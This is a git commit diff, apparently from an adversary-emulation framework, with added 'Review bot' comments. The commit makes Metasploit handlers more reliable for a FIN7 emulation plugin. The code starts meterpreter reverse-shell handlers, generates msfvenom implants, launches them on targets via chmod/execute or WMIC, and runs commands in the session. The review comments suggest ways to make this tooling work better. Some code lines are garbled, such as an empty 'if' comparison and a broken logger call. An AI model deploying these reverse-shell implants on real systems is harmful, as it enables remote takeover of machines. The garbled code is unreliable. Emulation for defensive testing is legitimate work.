More reliable metasploit

Thorsten Sick 3 years ago
parent db2cce262f
commit 5eeaa02b4d

@ -91,6 +91,7 @@ class Experiment():
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1)
time.sleep(20) # Wait for all the clients to contact the caldera server
# TODO: Smarter wait
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Contacting caldera agents on all targets ....{CommandlineColors.ENDC}", 1)
# Wait until all targets are registered as Caldera targets

@ -43,19 +43,25 @@ class Metasploit():
kwargs["server"] = self.attacker.get_ip()
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'):
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None):
""" Start a metasploit handler and wait for external payload to connect
@param payload: The payload being used in the implant
@param exploit: Normally the generic handler. Overwrite it if you feel lucky
@param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller.
@:returns: res, which contains "job_id" and "uuid"
exploit = self.get_client().modules.use('exploit', exploit)
exp = self.get_client().modules.use('exploit', exploit)
# print(exploit.description)
# print(exploit.missing_required)
payload = self.get_client().modules.use('payload', payload)
pl = self.get_client().modules.use('payload', payload)
# print(payload.description)
# print(payload.missing_required)
payload["LHOST"] = self.attacker.get_ip()
res = exploit.execute(payload=payload)
if lhost is None:
lhost = self.attacker.get_ip()
pl["LHOST"] = lhost
print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}")
res = exp.execute(payload=pl)
return res
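Review bot: The result of `exp.execute(payload=pl)` is returned unchecked, so a handler that fails to start (port already bound, an LHOST the attacker box cannot bind) only surfaces later as the generic "Can not find any session" timeout in the session-wait loop, far from the real cause. If `res` is the dict the docstring describes, a guard right after the call pins the failure to this step: `if not res.get("job_id"): raise MetasploitError(f"Handler did not start for {exploit}/{payload} on {lhost}: {res}")`. The new `print` also bypasses `self.attack_logger`, which the rest of the framework uses for the attack log, so the LHOST that was actually bound is not recorded; `self.attack_logger.vprint(...)` would keep it. The docstring's `@:returns:` is presumably meant to be `@returns:`.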
@ -104,7 +110,7 @@ class Metasploit():
while self.get_client().sessions.list == {}:
print(f"Waiting to get any session {retries}")
print(f"Metasploit waiting to get any session {retries}")
retries -= 1
if retries <= 0:
raise MetasploitError("Can not find any session")
@ -276,6 +282,7 @@ class MSFVenom():
cmd += f" -e {encoder}"
if iterations is not None:
cmd += f" -i {iterations}"
cmd += " SessionRetryWait=1 "
# Detecting all the mistakes that already have been made. To be continued
# Check if encoder supports the architecture
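Review bot: `SessionRetryWait=1` is appended to every msfvenom command line unconditionally, so each generated implant reconnects every second regardless of what the caller asked for; this looks like it should be a keyword argument with a default of 1 rather than a hard-coded literal, e.g. `if session_retry_wait is not None: cmd += f" SessionRetryWait={session_retry_wait} "`. For an adversary-emulation tool the retry interval also shapes the beaconing footprint a detection team sees, so a why-comment would help, such as `# Aggressive reconnect so the handler catches the stager quickly; tune for realism`. The enclosing function's signature starts before this hunk.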
@ -294,6 +301,7 @@ class MSFVenom():
# Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here
def generate_and_deploy(self, **kwargs):
@ -327,8 +335,7 @@ class MSFVenom():
cmd = ""
cmd += f"chmod +x {payload_name}; ./{payload_name}"
if == "windows":
cmd = f'{payload_name}'
cmd = f'wmic process call create "%homepath%\\{payload_name}",""'
if self.attack_logger:
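Review bot: The new `wmic process call create` line detaches the payload but never checks whether the process was actually created; WMIC appears to report the outcome as a `ReturnValue = N` line in its output rather than through the shell exit status (verify against your remote_run wrapper), so a missing file or blocked execution will only show up later as a session-wait timeout. Checking the output for `ReturnValue = 0` before moving on would pin the failure to this step. Note also that `payload_name` is interpolated straight into a double-quoted WMIC command line, and that WMIC is deprecated by Microsoft and may be absent on recent Windows 11 builds, so a PowerShell `Start-Process` fallback may be needed for newer targets. The `if == "windows":` condition at the top of the hunk appears garbled in this rendering; the variable being compared is not visible.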

@ -1,6 +1,7 @@
#!/usr/bin/env python3
# Adversary emulation for FIN7
import socket
from plugins.base.attack import AttackPlugin
from app.interface_sfx import CommandlineColors
@ -27,13 +28,17 @@ class FIN7Plugin(AttackPlugin):
self.plugin_path = __file__
self.metasploit_1 = None
def get_metasploit_1(self):
""" Returns a metasploit with a session for the first targeted machine """
def get_metasploit_1(self, payload):
""" Returns a metasploit with a session for the first targeted machine
@param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
if self.metasploit_1:
return self.metasploit_1
self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
return self.metasploit_1
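Review bot: The new `payload` parameter is never used: the handler at the end of the hunk is started with `payload=self.payload_type_1`, so a caller asking for a different payload silently gets a handler for the wrong one, while the docstring promises the method waits for the payload passed in. Either pass it through, `self.metasploit_1.start_exploit_stub_for_external_payload(payload=payload, lhost=ip)`, or drop the parameter. The instance is also cached on `self.metasploit_1` without recording which payload it was started for, so a second call with a different payload returns the first handler; a comment such as `# Cached: the first payload wins, later calls ignore their argument` or a check against the stored payload would make that explicit. The `socket.gethostbyname(...)` lookup runs on the controller, so the resulting LHOST is the address as the controller resolves it, which in a NAT'd lab may not be one the attacker box can bind; logging the resolved IP would make that easier to debug.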
@ -179,7 +184,6 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = ""
architecture = "x64"
target_platform = "windows"
@ -271,8 +275,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: Babymetal payload is a dll. Currently we are using a simplification here (exe). Implement the proper steps.
payload = self.payload_type_1
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
@ -288,9 +294,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: invoke-Shellcode.ps1 loads shellcode into powershell.exe memory (Allocate memory, copy shellcode, start thread) (received from C2 server)
# metasploit1 = self.get_metasploit_1()
# print("Got session, calling command")
# print(metasploit.meterpreter_execute_on(["getuid"], hotelmanager))
metasploit1 = self.get_metasploit_1(payload)
print("Got session, calling command")
print(metasploit1.meterpreter_execute_on(["getuid"], hotelmanager))
print("Should have called session now")
f"{CommandlineColors.OKGREEN}End Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}", 1)
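Review bot: The `getuid` result at `print(metasploit1.meterpreter_execute_on(["getuid"], hotelmanager))` goes to stdout only, while the step boundaries around it go through `self.attack_logger.vprint`, so the one piece of evidence that the session actually works is missing from the attack log. Routing it through the logger, e.g. `self.attack_logger.vprint(f"getuid: {metasploit1.meterpreter_execute_on(['getuid'], hotelmanager)}", 1)`, keeps the record complete. The enclosing step method continues outside the hunk.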
@ -303,8 +310,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
hotelmanager = self.get_target_by_name("hotelmanager")
payload = self.payload_type_1
# This is meterpreter !
metasploit = self.get_metasploit_1()
metasploit = self.get_metasploit_1(payload)
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?)
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute ps -ax through meterpreter{CommandlineColors.ENDC}", 1)
@ -730,11 +739,11 @@ NOT IMPLEMENTED YET
filename = "AccountingIQ.exe"
dl_uri = ""
logid = self.attack_logger.start_build(
logid = self.attack_logger.start_build(filename=filename,
comment="This is a simulated credit card tool to target. The final flag is in here.")
comment="This is a simulated credit card tool to target. The final flag is in here."
# simulated credit card tool as target
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm (unknown)")
